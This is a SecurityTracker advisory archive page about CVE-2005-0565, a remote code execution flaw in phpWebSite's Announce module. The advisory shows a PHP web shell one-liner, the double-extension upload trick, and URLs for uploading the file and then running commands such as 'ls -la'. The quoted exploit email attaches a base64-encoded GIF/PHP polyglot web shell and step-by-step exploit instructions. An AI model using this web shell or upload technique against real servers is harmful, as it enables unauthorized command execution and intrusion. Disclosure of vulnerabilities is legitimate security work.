SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   phpWebSite Vendors:   phpWebSite Development Team
phpWebSite Announce Module Image Files Let Remote Users Execute Arbitrary PHP Code
SecurityTracker Alert ID:  1013298
SecurityTracker URL:  http://securitytracker.com/id/1013298
CVE Reference:   CVE-2005-0565   (Links to External Site)
Updated:  Feb 28 2005
Original Entry Date:  Feb 25 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.10.0 and prior versions
Description:   A vulnerability was reported in phpWebSite in the Announce module. A remote user with privileges to upload image files can execute arbitrary commands on the target system.

A remote user can create a specially crafted file that appears to be formatted as a GIF file but actually contains the following type of PHP code:

<?passthru($_GET[nst]);?>

If the remote user has privileges to submit announcements, the remote user can invoke the following type of URL and upload the specially crafted file as the Image file with a name of the form: "[anyname].gif.php":

http://[target]/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3

Then, the remote user can load the following URL to execute commands on the target system:

http://[target]/images/announce/[anyname].gif.php?nst=ls -la

Arbitrary PHP code and operating system commands can be executed with the privileges of the target web services.

Network security team discovered this vulnerability.

tjomka disclosed this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands with the privileges of the target web services.
Solution:   No solution was available at the time of this entry.
Vendor URL:  phpwebsite.appstate.edu/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  phpWebSite-0.10.0_exploit


------------C81D4230180A6D
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

phpWebSite-0.10.0_exploit
------------C81D4230180A6D
Content-Type: application/octet-stream; name="nst.gif.php"
Content-transfer-encoding: base64
Content-Disposition: attachment; filename="nst.gif.php"

R0lGODlhMgAyAPcAAE1NTZubm1FRUREREYMMDDIQEFtbWw0KDQoNCsUNCgl8BQXU1NTNzc2E
hIRVVVUDAwOpqqnKyso8cHJlPsJPDQoNCjw/cGFzc3RocnUoJF9HRVRbbnN0XSk7Pz622ABX
VsAo7FHJkIyEDvDwD4a00QEOWeFfJuBEPVPhDQr+reMR+uymZjlbWwNYmgUBAQA7
------------C81D4230180A6D
Content-Type: text/plain; name="phpWebSite-0.10.0.EN.txt"
Content-transfer-encoding: base64
Content-Disposition: attachment; filename="phpWebSite-0.10.0.EN.txt"

b29vby4uLm9vb28ub29vb29vb284Lm9vb29vb29vb29vIA0KLjg4ODhvLi44OC44ODguLi4u
Li4uLjg4Li44ODguLjg4IA0KLjg4Ljg4OG84OC4uODg4b29vb29vLi4uLi44ODggICAgIA0K
Ljg4Li4uODg4OC4uLi4uLi4uLjg4OC4uLi44ODggICAgIA0Kbzg4by4uLi44OC5vODhvb29v
ODg4Li4uLm84ODhvICAgIA0KKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioNCioq
KiogTmV0d29yayBzZWN1cml0eSB0ZWFtICoqKioqDQoqKioqKioqKiogbnN0LmUtbmV4LmNv
bSAqKioqKioqKg0KKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioNCiogVGl0bGU6
IHBocFdlYlNpdGUgPD0gdjAuMTAuMA0KKiBCdWcgZm91bmQgYnk6IG5zdA0KKiBEYXRlOiAy
NC4wMi4yMDA1DQoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKg0KDQpXZWI6IHBo
cHdlYnNpdGUuYXBwc3RhdGUuZWR1DQoNCmh0dHA6Ly90YXJnZXQvaW5kZXgucGhwP21vZHVs
ZT1hbm5vdW5jZSZBTk5fdXNlcl9vcD1zdWJtaXRfYW5ub3VuY2VtZW50Jk1NTl9wb3NpdGlv
bj0zOjMNCg0KMS4gRmlsbCBhbGwgaW5wdXRzDQoyLiBpbiBJbWFnZTogc2VsZWN0IG5zdC5n
aWYucGhwDQoNCnByZXNzIFNhdmUuDQoNCkdvIGhlcmUgaHR0cDovL3RhcmdldC9pbWFnZXMv
YW5ub3VuY2UvbnN0LmdpZi5waHA/bnN0PWxzIC1sYQ==
------------C81D4230180A6D--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC